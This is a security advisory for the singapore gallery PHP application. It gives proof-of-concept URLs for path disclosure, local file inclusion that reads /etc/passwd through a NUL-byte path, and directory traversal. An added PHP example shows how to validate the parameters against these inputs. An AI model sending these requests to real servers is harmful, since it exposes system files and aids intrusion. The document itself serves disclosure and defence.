singapore gallery <= 0.10.0 Multiple Vulnerabilities



Product       : singapore gallery
Versions      : 0.10.0 and prior
Site          : http://www.sgal.org/
Discovered By : Moroccan Security Research Team (Simo64)
Greetz        : CiM-Team - dabdoub - DarkbiteX - drackanz - Iss4m - Mourad - Rachid
              .:r00tkita - s4mi - Silitix - tahati -   And All Friends :)

[-] Vulnerable code near lines 16-35

config->base_path.$sg->config->pathto_current_template."index.tpl.php";
?>

[+] Full Path Disclosure :
**************************
Example:

http://localhost/singapore/index.php?template=simo64

Result :

Warning: main(templates/simo64/index.tpl.php): failed to open stream: No such file or directory in /home/sing/public_html/livedemo/index.php on line 35


[+] Local File Inclusion :
***************************
Proof Of Concept :

http://localhost/singapore/index.php?template=./../../../../etc/passwd%00

[+] Cross Site Scripting :
**************************

http://localhost/singapore/index.php?template=

[+] Directory Traversal  :
**************************
Proof Of Concept :

http://localhost/singapore/index.php?gallery=./../../../ 
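
[*] Added example (not part of the original advisory, and not singapore's own code or fix): one way to validate the template and gallery parameters before they reach include() or a directory listing. The function names safe_template and safe_gallery and the templates/ and galleries/ layout are assumptions made for the demo.

```php
<?php
// Added example; function names and directory layout are assumptions.

// Template names are single directory names: allowlist the characters.
function safe_template(string $templatesDir, string $name, string $default = 'default'): string
{
    // The regex rejects '/', '.', NUL (%00) and markup before any file access.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)
        || !is_file("$templatesDir/$name/index.tpl.php")) {
        return $default;              // never echo $name or the path back
    }
    return $name;
}

// Gallery ids may be nested paths: canonicalise, then check containment.
function safe_gallery(string $galleriesDir, string $id): ?string
{
    if (strpos($id, "\0") !== false) {
        return null;                  // NUL byte (%00) truncation attempt
    }
    $base = realpath($galleriesDir);
    // realpath() collapses ./ and ../ and returns false for missing paths.
    $target = $base === false ? false : realpath($base . '/' . $id);
    if ($target === false || !is_dir($target)) {
        return null;
    }
    // The canonical path must be the base itself or sit below it.
    if ($target !== $base
        && strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $target;
}

// Constructed demo layout in a temp directory.
$root = sys_get_temp_dir() . '/sg_demo_' . bin2hex(random_bytes(4));
mkdir("$root/templates/default", 0700, true);
mkdir("$root/galleries/holiday", 0700, true);
touch("$root/templates/default/index.tpl.php");

// Constructed inputs mirroring the requests shown in the advisory.
foreach (['default', 'simo64', "./../../../../etc/passwd\0"] as $t) {
    printf("template %-32s -> %s\n", addcslashes($t, "\0"), safe_template("$root/templates", $t));
}
foreach (['holiday', './../../../', "holiday\0"] as $g) {
    printf("gallery  %-32s -> %s\n", addcslashes($g, "\0"), safe_gallery("$root/galleries", $g) ?? 'rejected');
}
```

Falling back to a fixed default instead of reporting the failed name also keeps the requested value and the server path out of the response, which is what the path disclosure and XSS items rely on.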
